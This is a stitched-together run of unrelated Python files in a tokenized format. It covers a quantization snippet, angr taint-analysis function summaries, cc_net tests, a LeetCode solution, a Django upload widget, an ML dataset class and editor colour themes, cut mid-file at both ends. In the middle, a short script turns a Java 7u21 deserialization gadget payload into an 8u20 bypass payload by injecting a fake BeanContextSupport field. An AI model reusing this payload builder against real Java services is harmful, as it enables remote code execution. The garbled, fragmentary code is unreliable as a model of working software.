self._graph_transformer.fq_removal.quantize_operations)<block_end>@staticmethod<def_stmt>_get_result_aa metrics_accuracy_drop num_of_reverted_layers<block_start><try_stmt><block_start><return>str({'final_drop':dict(metrics_accuracy_drop) 'num_of_reverted_layers':num_of_reverted_layers})<block_end><except_stmt>Exception<as>e# pylint: disable=broad-except <block_start>logger.info("Error occurred while trying to send telemetry. Details:"+str(e))<line_sep><return>str(<none>)<block_end><block_end>@staticmethod<def_stmt>_create_quantization_algo algo_config name engine<block_start>algo=COMPRESSION_ALGORITHMS.get(algo_config.base_algorithm)(algo_config engine)<line_sep>algo.name=name<line_sep><return>algo<block_end><block_end>
<import_stmt>yaml<import_from_stmt>javaSerializationTools JavaString JavaField JavaObject JavaEndBlock<import_from_stmt>javaSerializationTools ObjectRead<import_from_stmt>javaSerializationTools ObjectWrite<if_stmt>__name__<eq>'__main__'<block_start><with_stmt>open("../files/7u21.ser" "rb")<as>f<block_start>a=ObjectRead(f)<line_sep>obj=a.readContent()<line_sep># 第一步,向HashSet添加一个假字段,名字fake signature=JavaString("Ljava/beans/beancontext/BeanContextSupport;")<line_sep>fakeSignature={'name':'fake' 'signature':signature}<line_sep>obj.javaClass.superJavaClass.fields.append(fakeSignature)<line_sep># 构造假的BeanContextSupport反序列化对象,注意要引用后面的AnnotationInvocationHandler # 读取BeanContextSupportClass的类的简介 <with_stmt>open('BeanContextSupportClass.yaml' 'r')<as>f1<block_start>BeanContextSupportClassDesc=yaml.load(f1.read() Loader=yaml.FullLoader)<block_end># 向beanContextSupportObject添加beanContextChildPeer属性 beanContextSupportObject=JavaObject(BeanContextSupportClassDesc)<line_sep>beanContextChildPeerField=JavaField('beanContextChildPeer' JavaString('Ljava/beans/beancontext/BeanContextChild') beanContextSupportObject)<line_sep>beanContextSupportObject.fields.append([beanContextChildPeerField])<line_sep># 向beanContextSupportObject添加serializable属性 serializableField=JavaField('serializable' 'I' 1)<line_sep>beanContextSupportObject.fields.append([serializableField])<line_sep># 向beanContextSupportObject添加objectAnnontations 数据 beanContextSupportObject.objectAnnotation.append(JavaEndBlock())<line_sep>AnnotationInvocationHandler=obj.objectAnnotation[2].fields[0][0].value<line_sep>beanContextSupportObject.objectAnnotation.append(AnnotationInvocationHandler)<line_sep># 把beanContextSupportObject对象添加到fake属性里 fakeField=JavaField('fake' fakeSignature['signature'] beanContextSupportObject)<line_sep>obj.fields[0].append(fakeField)<block_end><with_stmt>open("8u20.ser" 'wb')<as>f<block_start>o=ObjectWrite(f)<line_sep>o.writeContent(obj)<block_end><block_end>
""" Though karonte relies on angr's sim procedures, sometimes these add in the current state some constraints to make the used analysis faster. For example, if a malloc has an unconstrained size, angr add the constraint size == angr-defined.MAX_SIZE. Though this makes the analysis faster, it makes impossible to reason about the maximum buffer sizes (as needed by karonte). In this module we wrap sim procedures to avoid them to add such constraints. Note however, that the semantic of an expression might get lost. Eg. strlen(taint_x) = taint_y, taint_y is an unconstrained variable """<import_from_stmt>taint_analysis.coretaint *<def_stmt>_get_function_name addr p<block_start>""" Return a function name :param addr: function address :param p: angr project :return: function name """<line_sep><return>p.loader.find_plt_stub_name(addr)<block_end><def_stmt>source_dummy *_ **__<block_start><pass><block_end><def_stmt>memcmp_unsized _core _ plt_path<block_start>""" memcmp-like unsized (e.g., strlen) function summary :param _core: core taint engine :param _: not used :param plt_path: path to the plt (i.e., call_site.step()) :return: None """<line_sep>p=_core.p<line_sep>dst_reg=arg_reg_name(p 0)<line_sep>src_reg=arg_reg_name(p 1)<line_sep>b1=_core.safe_load(plt_path getattr(plt_path.active[0].regs dst_reg))<line_sep>b2=_core.safe_load(plt_path getattr(plt_path.active[0].regs src_reg))<if_stmt><not>_core.is_tainted(b1 plt_path)<block_start>b1=<none><block_end><if_stmt><not>_core.is_tainted(b2 plt_path)<block_start>b2=<none><block_end># if either of the two is not tainted, we untaint the other <if_stmt>b1<is><not><none><and>b2<is><none><block_start>_core.do_recursive_untaint(b1 plt_path)<block_end><elif_stmt>b2<is><not><none><and>b1<is><none><block_start>_core.do_recursive_untaint(b2 plt_path)<block_end># step into it plt_path.step()<assert_stmt>_core.p.is_hooked(plt_path.active[0].addr) "memcmp_unsized: Summary function relies on angr's "<concat>"sim procedure, add option use_sim_procedures to the loader"<line_sep>plt_path.step()<block_end><def_stmt>memcmp_sized _core _ plt_path<block_start>""" memcmp-like sized (e.g., memcmp) function summary :param _core: core taint engine :param _: not used :param plt_path: path to the plt (i.e., call_site.step()) :return: None """<line_sep>p=_core.p<line_sep>dst_reg=arg_reg_name(p 0)<line_sep>src_reg=arg_reg_name(p 1)<line_sep>reg_n=arg_reg_name(p 2)<line_sep>b1=_core.safe_load(plt_path getattr(plt_path.active[0].regs dst_reg))<line_sep>b2=_core.safe_load(plt_path getattr(plt_path.active[0].regs src_reg))<line_sep>n=_core.safe_load(plt_path getattr(plt_path.active[0].regs reg_n))<line_sep># we untaint buffers only if n is not tainted <if_stmt><not>_core.is_tainted(n plt_path)<block_start><if_stmt><not>_core.is_tainted(b1 plt_path)<block_start>b1=<none><block_end><if_stmt><not>_core.is_tainted(b2 plt_path)<block_start>b2=<none><block_end># if either of the two is not tainted, we untaint the other <if_stmt>b1<is><not><none><and>b2<is><none><block_start>_core.do_recursive_untaint(b1 plt_path)<block_end><elif_stmt>b2<is><not><none><and>b1<is><none><block_start>_core.do_recursive_untaint(b2 plt_path)<block_end><block_end># step into it plt_path.step()<assert_stmt>_core.p.is_hooked(plt_path.active[0].addr) "memcmp_sized: Summary function relies on angr's "<concat>"sim procedure, add option use_sim_procedures to the loader"<line_sep>plt_path.step()<block_end><def_stmt>memcpy_sized _core call_site_path plt_path<block_start>""" memcpy-like sized (e.g., memcpy) function summary :param _core: core taint engine :param call_site_path: call site angr path :param plt_path: path to the plt (i.e., call_site.step()) :return: None """<line_sep>p=_core.p<line_sep># if the second parameter is tainted (or pointing to a tainted location) # or the third is tainted, we taint the first too dst_reg=arg_reg_name(p 0)<line_sep>dst=getattr(plt_path.active[0].regs dst_reg)<line_sep>dst_loaded=_core.safe_load(plt_path dst)<line_sep>src_reg=arg_reg_name(p 1)<line_sep>src=getattr(plt_path.active[0].regs src_reg)<line_sep>src_loaded=_core.safe_load(plt_path src)<line_sep>reg_n=arg_reg_name(p 2)<line_sep>n=getattr(plt_path.active[0].regs reg_n)<line_sep># n_loaded = _core.safe_load(plt_path_cp, size) plt_path.step()<assert_stmt>_core.p.is_hooked(plt_path.active[0].addr) "memcpy_sized: Summary function relies on angr's "<concat>"sim procedure, add option use_sim_procedures to the loader"<line_sep>plt_path.step()<if_stmt><not>plt_path.active<block_start><raise>Exception("size of function has no active successors, not walking this path...")<block_end># apply taint to dst if source is tainted and constrain this buffer # TODO take N into account <if_stmt>_core.is_tainted(src_loaded path=plt_path)<block_start>src_loaded_full=_core.safe_load(plt_path src estimate_size=<true>)<line_sep>new_dst_t=_core.get_sym_val(name=_core.taint_buf bits=src_loaded_full.length).reversed<line_sep>_core.add_taint_glob_dep(new_dst_t src_loaded_full plt_path)<line_sep>plt_path.active[0].add_constraints(src_loaded_full<eq>new_dst_t)<line_sep>plt_path.active[0].memory.store(dst new_dst_t)<block_end># untaint if the size is constrained <if_stmt>(_core.is_tainted(dst path=plt_path)<or>_core.is_tainted(dst_loaded path=plt_path))<and><not>_core.is_tainted(n path=plt_path)# do untaint <block_start>_core.do_recursive_untaint(dst_loaded plt_path)<block_end><block_end><def_stmt>memcpy_unsized _core call_site_path plt_path<block_start>""" memcpy-like unsize (e.g., strcpy) function summary :param _core: core taint engine :param call_site_path: call site angr path :param plt_path: path to the plt (i.e., call_site.step()) :return: None """<line_sep>p=_core.p<line_sep>dst_reg=arg_reg_name(p 0)<line_sep>dst=getattr(plt_path.active[0].regs dst_reg)<line_sep># dst_loaded = _core.safe_load(plt_path_cp, dst, estimate_size=True) src_reg=arg_reg_name(p 1)<line_sep>src=getattr(plt_path.active[0].regs src_reg)<line_sep>src_loaded=_core.safe_load(plt_path src)<line_sep># run the sim procedure plt_path.step()<assert_stmt>_core.p.is_hooked(plt_path.active[0].addr) "memcpy_unsized: Summary function relies on angr's "<concat>"sim procedure, add option use_sim_procedures to the loader"<line_sep>plt_path.step()<if_stmt><not>plt_path.active<block_start><raise>Exception("size of function has no active successors, not walking this path...")<block_end># apply taint to dst if source is tainted and constrain this buffer <if_stmt>_core.is_tainted(src_loaded path=plt_path)<block_start>src_loaded_full=_core.safe_load(plt_path src estimate_size=<true>)<line_sep>new_dst_t=_core.get_sym_val(name=_core.taint_buf bits=src_loaded_full.length).reversed<line_sep>_core.add_taint_glob_dep(new_dst_t src_loaded_full plt_path)<line_sep>plt_path.active[0].add_constraints(src_loaded_full<eq>new_dst_t)<line_sep>plt_path.active[0].memory.store(dst new_dst_t)<block_end><block_end><def_stmt>is_size_taint v<block_start><return>'__size__'<in>str(v)<block_end><def_stmt>sizeof _core call_site_path plt_path<block_start>""" sizeof-like (e.g., strlen) function summary :param _core: core taint engine :param call_site_path: call site angr path :param plt_path: path to the plt (i.e., call_site.step()) :return: None """<line_sep>p=_core.p<line_sep>n=getattr(plt_path.active[0].regs arg_reg_name(p 0))<line_sep>cnt=_core.safe_load(plt_path n _core.taint_buf_size/8)<line_sep># use the sim procedure to continue to the next state and add constraints plt_path.step()<assert_stmt>_core.p.is_hooked(plt_path.active[0].addr) "sizeof: Summary function relies on angr's "<concat>"sim procedure, add option use_sim_procedures to the loader"<line_sep>plt_path.step()<if_stmt><not>plt_path.active<block_start><raise>Exception("size of function has no active successors, not walking this path...")<block_end>return_value=getattr(plt_path.active[0].regs ret_reg_name(p))<line_sep># TODO: check if the constraints set by angr sim procedure are correct # if there is a tainted buffer in one of the registers then also taint this variable <if_stmt>_core.is_tainted(cnt path=plt_path)<or>_core.is_tainted(n path=plt_path)<block_start>t=_core.get_sym_val(name=(_core.taint_buf+'__size__') bits=p.arch.bits).reversed<line_sep>_core.add_taint_glob_dep(t cnt plt_path)<line_sep># constrain output of this variable equal to the output of sizeof and add it to the return register plt_path.active[0].add_constraints(return_value<eq>t)<line_sep>setattr(plt_path.active[0].regs ret_reg_name(p) t)<block_end><block_end># # Heap functions # <def_stmt>_malloc _core _ plt_path<block_start>""" maclloc function summary :param _core: core taint engine :param plt_path: path to the plt (i.e., call_site.step()) :return: None """<line_sep>p=_core.p<line_sep>state=plt_path.active[0]<line_sep>sim_size=getattr(state.regs arg_reg_name(p 0))<line_sep># when the size is symbolic, choose the maximum size possible <if_stmt>state.solver.symbolic(sim_size)<block_start>size=state.solver.max(sim_size)<if_stmt>size<g>state.libc.max_variable_size<block_start>size=state.libc.max_variable_size<block_end>setattr(state.regs arg_reg_name(p 0) size)<block_end># use the sim procedure plt_path.step()<assert_stmt>_core.p.is_hooked(plt_path.active[0].addr) "malloc: Summary function relies on angr's "<concat>"sim procedure, add option use_sim_procedures to the loader"<line_sep>plt_path.step()<line_sep><return>sim_size<block_end><def_stmt>_realloc _core _ plt_path<block_start>""" realloc function summary :param _core: core taint engine :param plt_path: path to the plt (i.e., call_site.step()) :return: None """<line_sep>p=_core.p<line_sep>state=plt_path.active[0]<line_sep>sim_size=getattr(state.regs arg_reg_name(p 1))<line_sep># ptr = getattr(state.regs, arg_reg_name(p, 0)) # when the size is symbolic, choose the maximum size possible <if_stmt>state.solver.symbolic(sim_size)<block_start>size=state.solver.max(sim_size)<if_stmt>size<g>state.libc.max_variable_size<block_start>size=state.libc.max_variable_size<block_end>setattr(state.regs arg_reg_name(p 0) size)<block_end># if the size is not tainted, use the sim procedure plt_path.step()<assert_stmt>_core.p.is_hooked(plt_path.active[0].addr) "realloc: Summary function relies on angr's "<concat>"sim procedure, add option use_sim_procedures to the loader"<line_sep>plt_path.step()<line_sep><return>sim_size<block_end><def_stmt>heap_alloc _core call_site_path plt_path<block_start>""" Heap allocation function stub :param _core: core taint engine :param call_site_path: call site angr path :param plt_path: path to the plt (i.e., call_site.step()) :return: None """<line_sep>fname=_get_function_name(plt_path.active[0].addr _core.p)<line_sep>sim_size=<none><if_stmt>fname<eq>'malloc'<block_start>sim_size=_malloc(_core call_site_path plt_path)<block_end><elif_stmt>fname<eq>'realloc'<block_start>sim_size=_realloc(_core call_site_path plt_path)<block_end><else_stmt><block_start>print(f"Implement this heap alloc: {fname}")<block_end><if_stmt>sim_size<is><not><none><block_start>taint_args=[l<for>l sim_size.recursive_leaf_asts<if>_core.is_tainted(l call_site_path)]<if_stmt>taint_args<and>len(set(taint_args))<eq>1<block_start>arg=taint_args[0]<if_stmt>is_size_taint(arg)<block_start>_core.do_recursive_untaint(arg plt_path)<block_end><block_end><block_end><block_end># # Env function # env_var={}<def_stmt>_setenv _core _ plt_path<block_start>""" setenv function summary :param _core: core taint engine :param plt_path: path to the plt (i.e., call_site.step()) :return: None """<line_sep><global>env_var<line_sep>p=_core.p<line_sep>plt_path_cp=plt_path.copy(deep=<true>)<line_sep>plt_state_cp=plt_path_cp.active[0]<line_sep># add the environment variable to the list of env_variables with this key key=getattr(plt_path.active[0].regs arg_reg_name(p 0))<line_sep>env_var[str(key)]=getattr(plt_path.active[0].regs arg_reg_name(p 1))<line_sep># this call can continue with an empty sim procedure since it does nothing next_state=plt_state_cp.step()<line_sep>_core.p.hook(next_state.addr ReturnUnconstrained())<line_sep>plt_path.step().step()<block_end><def_stmt>_getenv _core call_site_addr plt_path<block_start>""" getenv function summary :param _core: core taint engine :param call_site_addr: call site angr path :param plt_path: path to the plt (i.e., call_site.step()) :return: None """<line_sep><global>env_var<line_sep>p=_core.p<line_sep>env_var_size=_core.taint_buf_size<line_sep>reg=getattr(plt_path.active[0].regs arg_reg_name(p 0))<line_sep>cnt_mem=_core.safe_load(plt_path reg)<line_sep>key=str(reg)<line_sep># this info is passed by some user controllable source <if_stmt>_core.is_tainted(reg path=plt_path)<or>_core.is_tainted(cnt_mem path=plt_path)<block_start>to_store=_core.get_sym_val(name=_core.taint_buf bits=env_var_size)<block_end># it was set before <elif_stmt>key<in>env_var<block_start>to_store=env_var[key]<block_end># fresh symbolic var <else_stmt><block_start>to_store=_core.get_sym_val(name="env_var" bits=env_var_size)<block_end># store the symbolic buffer at the memory address addr=plt_path.active[0].heap.allocate(env_var_size)<line_sep>plt_path.active[0].memory.store(addr to_store)<line_sep># use an empty hook as sim procedure to continue with the program plt_path_cp=plt_path.copy(deep=<true>)<line_sep>plt_state_cp=plt_path_cp.active[0]<line_sep>next_state=plt_state_cp.step()<line_sep>_core.p.hook(next_state.addr ReturnUnconstrained())<line_sep>plt_path.step().step()<line_sep># set the return address to the pointer setattr(plt_path.active[0].regs ret_reg_name(p) addr)<block_end><def_stmt>env _core call_site_path plt_path<block_start>""" Summarize environment functions (getenv, and setenv) :param _core: core taint engin :param call_site_path: call site angr path :param plt_path: path to the plt (i.e., call_site.step()) :return: """<line_sep>fname=_get_function_name(plt_path.active[0].addr _core.p)<if_stmt>fname<eq>'setenv'<block_start>_setenv(_core call_site_path plt_path)<block_end><elif_stmt>fname<eq>'getenv'<block_start>_getenv(_core call_site_path plt_path)<block_end><else_stmt><block_start>print(f"Implement this Env function: {fname}")<block_end># return the env_var if tainted to store for bug_finders <block_end># # Numerical # <def_stmt>atoi _core _ plt_path<block_start>p=_core.p<line_sep>state=plt_path.active[0]<line_sep>val=getattr(state.regs arg_reg_name(p 0))<if_stmt>_core.is_or_points_to_tainted_data(val plt_path)<block_start>addr=plt_path.active[0].memory.load(val p.arch.bytes)<line_sep>_core.do_recursive_untaint(addr plt_path)<block_end>plt_path.step().step()<block_end>
# Copyright (c) Facebook, Inc. and its affiliates. # # This source code is licensed under the MIT license found in the # LICENSE file in the root directory of this source tree. # <import_stmt>json<import_from_stmt>pathlib Path<import_stmt>pytest<import_stmt>cc_net<import_stmt>cc_net.minify<as>minify<import_from_stmt>cc_net jsonql process_wet_file<import_from_stmt>cc_net.minify HASH_SIZE decode_hashes encode_hashes encode_line_ids get_hashes <def_stmt>test_encode_decode <block_start>sentences=["Hello world !" "Is everyone happy in here ?"]<line_sep>hashes=get_hashes(sentences)<assert_stmt>all([len(h)<eq>HASH_SIZE<for>h hashes])<line_sep>hashes_int=[minify._b2i(h)<for>h hashes]<line_sep>encoded=encode_hashes(hashes)<line_sep>decoded=decode_hashes(encoded)<assert_stmt>all([len(d)<eq>HASH_SIZE<for>d decoded])<line_sep>decoded_int=[minify._b2i(d)<for>d decoded]<assert_stmt>hashes_int<eq>decoded_int<assert_stmt>hashes<eq>decoded<block_end><def_stmt>test_minify <block_start>doc={"raw_content":"Hello world !\nIs everyone happy in here ?" "language":"en" "perplexity":120.0 "line_ids":[0 4] }<line_sep>expected={"line_ids":"AAAEAA==" "language":"en" "perplexity":120.0}<line_sep>minifier=minify.Minifier()<assert_stmt>expected<eq>minifier(doc)<block_end>@pytest.fixture<def_stmt>http_from_disk monkeypatch<block_start><def_stmt>read_sample_file url:str n_retry:int=3<arrow>bytes<block_start>expected_url=process_wet_file.WET_URL_ROOT+"/crawl-data/sample.warc.wet"<assert_stmt>expected_url<eq>url<line_sep>file=Path(__file__).parent/"data"/"sample.warc.txt"<line_sep><return>file.read_bytes()<block_end>monkeypatch.setattr(cc_net.jsonql "request_get_content" read_sample_file)<block_end><def_stmt>test_minify_and_fetch http_from_disk tmp_path:Path<block_start>full_quotes="""Don't part with your illusions. When they are gone you may still exist, but you have ceased to live. Education: that which reveals to the wise, and conceals from the stupid, the vast limits of their knowledge. Facts are stubborn things, but statistics are more pliable. Fiction is obliged to stick to possibilities. Truth isn't."""<line_sep># We don't need no education. chosen_quotes="\n".join(l<for>l full_quotes.splitlines()<if>"Education"<not><in>l)<line_sep>cc_doc={"url":"http://sample_english.com" "date_download":"2019-03-18T00:00:00Z" "digest":"sha1:XQZHW7QWIG54HVAV3KPRW6MK5ILDNCER" "source_domain":"sample_english.com" "title":"Famous Mark Twain Quotes" "raw_content":full_quotes "cc_segment":"crawl-data/sample.warc.wet" "nlines":4 "length":353 }<line_sep>ccnet_metadata={"language":"en" "language_score":0.99 "perplexity":151.5 "bucket":"head" "raw_content":chosen_quotes "nlines":3 "length":len(chosen_quotes) "original_nlines":4 "original_length":353 "line_ids":[0 2 3] }<line_sep>ccnet_doc=dict(cc_doc **ccnet_metadata)<line_sep>mini=minify.Minifier()(ccnet_doc.copy())<assert_stmt>mini<is><not>ccnet_doc<line_sep>important_fields=["url" "digest" "cc_segment" "language" "language_score" "perplexity" "bucket" "line_ids" ]<line_sep>expected={k:ccnet_doc[k]<for>k important_fields}<line_sep>expected["line_ids"]=encode_line_ids(expected["line_ids"])# type: ignore <assert_stmt>expected<eq>mini<with_stmt>jsonql.open_write(tmp_path/"sample.json")<as>o<block_start>print(json.dumps(mini) file=o)<block_end>fetcher=minify.MetadataFetcher(tmp_path)<line_sep># line_ids is removed when unminifying ccnet_doc.pop("line_ids")<assert_stmt>ccnet_doc<eq>fetcher(cc_doc)<block_end><def_stmt>test_fetch http_from_disk tmp_path:Path<block_start>mini_docs=[{"url":"http://sample_chinese.com" "digest":"sha1:Y4E6URVYGIAFNVRTPZ5S3J64RTZTP6HJ" "cc_segment":"crawl-data/sample.warc.wet" "line_ids":encode_line_ids([2]) "bucket":"not_that_great" } {"url":"http://sample_english.com" "digest":"sha1:XQZHW7QWIG54HVAV3KPRW6MK5ILDNCER" "cc_segment":"crawl-data/sample.warc.wet" "line_ids":encode_line_ids([3]) "bucket":"top_notch" } ]<with_stmt>jsonql.open_write(tmp_path/"sample.json")<as>o<block_start><for_stmt>mini mini_docs<block_start>print(json.dumps(mini) file=o)<block_end><block_end>fetcher=minify.MetadataFetcher(tmp_path)<line_sep>cc=process_wet_file.CCSegmentsReader(["crawl-data/sample.warc.wet"])<line_sep>docs=[d<for>d fetcher.map(cc)<if>d<is><not><none>]<assert_stmt>cc.retrieved_segments<eq>1<line_sep># Note: documents are retrieved as they are ordered in the .warc.wet file <assert_stmt>["Facts are stubborn things, but statistics are more pliable." "事實是固執的東西,但統計數字卻比較柔和。" ]<eq>[d["raw_content"]<for>d docs]<assert_stmt>["top_notch" "not_that_great"]<eq>[d["bucket"]<for>d docs]<block_end>
<class_stmt>Solution# @param {string} s1 # @param {string} s2 # @param {string} s3 # @return {boolean} <block_start><def_stmt>isInterleave self s1 s2 s3<block_start>m=len(s1)<line_sep>n=len(s2)<if_stmt>m+n<ne>len(s3)<block_start><return><false><block_end>table=[([<false>]<times>(m+1))<for>i range(n+1)]<line_sep>table[0][0]=<true><for_stmt>i range(1 m+1)<block_start><if_stmt>s3[i-1]<eq>s1[i-1]<and>table[0][i-1]<eq><true><block_start>table[0][i]=<true><block_end><block_end><for_stmt>i range(1 n+1)<block_start><if_stmt>s3[i-1]<eq>s2[i-1]<and>table[i-1][0]<eq><true><block_start>table[i][0]=<true><block_end><block_end><for_stmt>i range(1 n+1)<block_start><for_stmt>j range(1 m+1)<block_start><if_stmt>s3[i+j-1]<eq>s2[i-1]<and>table[i-1][j]<eq><true><block_start>table[i][j]=<true><block_end><if_stmt>s3[i+j-1]<eq>s1[j-1]<and>table[i][j-1]<eq><true><block_start>table[i][j]=<true><line_sep><return>table[n][m]<block_end><block_end><block_end><block_end><block_end>
"""Tools for creating and manipulating event schedules and traffic matrices"""<import_from_stmt>fnss.traffic.eventscheduling *<import_from_stmt>fnss.traffic.trafficmatrices *<line_sep>
<import_stmt>mimetypes<import_from_stmt>django.contrib.staticfiles.storage staticfiles_storage<import_from_stmt>django.core signing<import_from_stmt>django.forms widgets<import_from_stmt>django.forms.utils flatatt<import_from_stmt>django.utils.safestring mark_safe<import_from_stmt>django.utils.html format_html<import_from_stmt>django.utils.translation ugettext_lazy<as>_<import_from_stmt>djng app_settings<class_stmt>DropFileWidget(widgets.Widget)<block_start>signer=signing.Signer()<def_stmt>__init__ self area_label fileupload_url attrs=<none><block_start>self.area_label=area_label<line_sep>self.fileupload_url=fileupload_url<line_sep>super(DropFileWidget self).__init__(attrs)<line_sep>self.filetype='file'<block_end><def_stmt>render self name value attrs=<none> renderer=<none><block_start><import_from_stmt>django.contrib.staticfiles.storage staticfiles_storage<line_sep>extra_attrs=dict(attrs)<line_sep>extra_attrs.update({'name':name 'class':'djng-{}-uploader'.format(self.filetype) 'djng-fileupload-url':self.fileupload_url 'ngf-drop':'uploadFile($file, "{0}", "{id}", "{ng-model}")'.format(self.filetype **attrs) 'ngf-select':'uploadFile($file, "{0}", "{id}", "{ng-model}")'.format(self.filetype **attrs) })<line_sep>self.update_attributes(extra_attrs value)<line_sep>final_attrs=self.build_attrs(self.attrs extra_attrs=extra_attrs)<line_sep>elements=[format_html('<textarea {}>{}</textarea>' flatatt(final_attrs) self.area_label)]<line_sep># add a spinnging wheel spinner_attrs={'class':'glyphicon glyphicon-refresh glyphicon-spin' 'ng-cloak':<true> }<line_sep>elements.append(format_html('<span {}></span>' flatatt(spinner_attrs)))<line_sep># add a delete icon icon_attrs={'src':staticfiles_storage.url('djng/icons/{}/trash.svg'.format(self.filetype)) 'class':'djng-btn-trash' 'title':_("Delete File") 'djng-fileupload-button ':<true> 'ng-click':'deleteImage("{id}", "{ng-model}")'.format(**attrs) 'ng-cloak':<true> }<line_sep>elements.append(format_html('<img {} />' flatatt(icon_attrs)))<line_sep># add a download icon <if_stmt>value<block_start>download_attrs={'href':value.url 'class':'djng-btn-download' 'title':_("Download File") 'download':<true> 'ng-cloak':<true> }<line_sep>download_icon=staticfiles_storage.url('djng/icons/{}/download.svg'.format(self.filetype))<line_sep>elements.append(format_html('<a {}><img src="{}" /></a>' flatatt(download_attrs) download_icon))<block_end><return>format_html('<div class="drop-box">{}</div>' mark_safe(''.join(elements)))<block_end><def_stmt>update_attributes self attrs value<block_start><if_stmt>value<block_start><try_stmt><block_start>content_type,_=mimetypes.guess_type(value.file.name)<line_sep>extension=mimetypes.guess_extension(content_type)[1:]<block_end><except_stmt>(IOError IndexError TypeError)<block_start>extension='_blank'<block_end>background_url=staticfiles_storage.url('djng/icons/{}.png'.format(extension))<line_sep>attrs.update({'style':'background-image: url({});'.format(background_url) 'current-file':self.signer.sign(value.name)})<block_end><block_end><block_end><class_stmt>DropImageWidget(DropFileWidget)<block_start><def_stmt>__init__ self area_label fileupload_url attrs=<none><block_start>super(DropImageWidget self).__init__(area_label fileupload_url attrs=attrs)<line_sep>self.filetype='image'<block_end><def_stmt>update_attributes self attrs value<block_start><if_stmt>value<block_start>background_url=self.get_background_url(value)<if_stmt>background_url<block_start>attrs.update({'style':'background-image: url({});'.format(background_url) 'current-file':self.signer.sign(value.name)})<block_end><block_end><block_end><def_stmt>get_background_url self value<block_start><import_from_stmt>easy_thumbnails.exceptions InvalidImageFormatError<import_from_stmt>easy_thumbnails.files get_thumbnailer<try_stmt><block_start>thumbnailer=get_thumbnailer(value)<line_sep>thumbnail=thumbnailer.get_thumbnail(app_settings.THUMBNAIL_OPTIONS)<line_sep><return>thumbnail.url<block_end><except_stmt>InvalidImageFormatError<block_start><return><block_end><block_end><block_end>
# Copyright (c) 2021 Graphcore Ltd. All rights reserved. # Copyright 2021 RangiLyu. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # This file has been modified by Graphcore Ltd. <import_stmt>numpy<as>np<import_stmt>torch<import_from_stmt>.xml_dataset XMLDataset<import_from_stmt>utils logger<if_stmt>logger.GLOBAL_LOGGER<is><not><none><block_start>print=logger.GLOBAL_LOGGER.log_str<block_end><def_stmt>calc_area boxes# boxes: n,4 # return <block_start>x1,y1,x2,y2=np.split(boxes 4 1)<line_sep>areas=(y2-y1)<times>(x2-x1)# n,1 <return>areas[: 0]<block_end><class_stmt>XMLDatasetForRcnn(XMLDataset)<block_start><def_stmt>__init__ self preset_indices=<none> area_filter_thrd=0.0 num_gtboxes=20 specified_length=<none> extra_layer=<none> **kwargs<block_start>self.area_filter_thrd=area_filter_thrd<line_sep>self.num_gtboxes=num_gtboxes<line_sep>self.preset_indices=preset_indices<line_sep>self._cur_for_preset_indices=0<line_sep>super(XMLDatasetForRcnn self).__init__(**kwargs)<line_sep>self.real_length=len(self.data_info)<line_sep>self.length=self.real_length<times>2<if>specified_length<is><none><else>specified_length<line_sep>self.extra_layer=extra_layer<block_end><def_stmt>get_train_data self idx<block_start>""" Load image and annotation :param idx: :return: meta-data (a dict containing image, annotation and other information) filter zero area boxes """<if_stmt>self.preset_indices<is><none><block_start><pass><block_end><else_stmt><block_start>idx=self.preset_indices[self._cur_for_preset_indices]<line_sep>self._cur_for_preset_indices<augadd>1<block_end>idx=int(idx%self.real_length)<line_sep>meta=super().get_train_data(idx)<line_sep># filter boxes and labels by area areas=calc_area(meta['gt_bboxes'])<line_sep>mask=areas<g>self.area_filter_thrd<line_sep>meta['gt_bboxes']=meta['gt_bboxes'][mask :]<line_sep>meta['gt_labels']=meta['gt_labels'][mask]<line_sep>meta['db_inds']=idx<line_sep># # pad boxes and inds boxes=np.zeros((self.num_gtboxes 4)).astype(np.float32)<line_sep>num_boxes=meta['gt_bboxes'].shape[0]<line_sep>boxes[:num_boxes :]=meta['gt_bboxes'][:self.num_gtboxes]<line_sep>meta['gt_bboxes']=torch.from_numpy(boxes)<line_sep>labels=np.asarray([0]<times>self.num_gtboxes)<line_sep>labels[:num_boxes]=meta['gt_labels'][:self.num_gtboxes]<line_sep>meta['gt_labels']=torch.from_numpy(labels)<line_sep>meta['num_boxes']=num_boxes<if_stmt>num_boxes<eq>0<block_start><return><none><block_end># return None will re-run this function # proc data in extra layer <if_stmt>self.extra_layer<is><not><none><block_start>meta=self.extra_layer(meta)<block_end><return>meta<block_end><def_stmt>__len__ self<block_start><return>self.length<block_end><block_end>
# -*- coding: utf-8 -*- # ----------------------------------------------------------------------------- # Copyright (c) Spyder Project Contributors # # Licensed under the terms of the MIT License # (see LICENSE.txt for details) # ----------------------------------------------------------------------------- ANSI_COLORS={'emacs':{'black':'#000000' 'red':'#800000' 'green':'#005100' 'yellow':'#abab67' 'blue':'#151d51' 'magenta':'#510051' 'cyan':'#105151' 'white':'#ffffff' 'brightBlack':'#555555' 'brightRed':'#c80000' 'brightGreen':'#00aa00' 'brightYellow':'#cbcb7b' 'brightBlue':'#3c51e8' 'brightMagenta':'#900090' 'brightCyan':'#20a7a7' 'brightWhite':'#ffffff'} 'idle':{'black':'#ffffff' 'red':'#8a0000' 'green':'#008a00' 'yellow':'#8a4000' 'blue':'#00008a' 'magenta':'#5a005a' 'cyan':'#105151' 'white':'#ffffff' 'brightBlack':'#555555' 'brightRed':'#dd0000' 'brightGreen':'#00aa00' 'brightYellow':'#ff7700' 'brightBlue':'#0000ff' 'brightMagenta':'#900090' 'brightCyan':'#20a7a7' 'brightWhite':'#ffffff'} 'monokai':{'black':'#48483e' 'red':'#dc2566' 'green':'#8fc029' 'yellow':'#d4c96e' 'blue':'#55bcce' 'magenta':'#9358fe' 'cyan':'#56b7a5' 'white':'#f8f8f2' 'brightBlack':'#76715e' 'brightRed':'#fa2772' 'brightGreen':'#a7e22e' 'brightYellow':'#e7db75' 'brightBlue':'#66d9ee' 'brightMagenta':'#ae82ff' 'brightCyan':'#66efd5' 'brightWhite':'#f9f8f5'} 'pydev':{'black':'#ffffff' 'red':'#800000' 'green':'#00aa00' 'yellow':'#ffff99' 'blue':'#0000ff' 'magenta':'#900090' 'cyan':'#007f7f' 'white':'#efefef' 'brightBlack':'#c0c0c0' 'brightRed':'#c10000' 'brightGreen':'#00cc00' 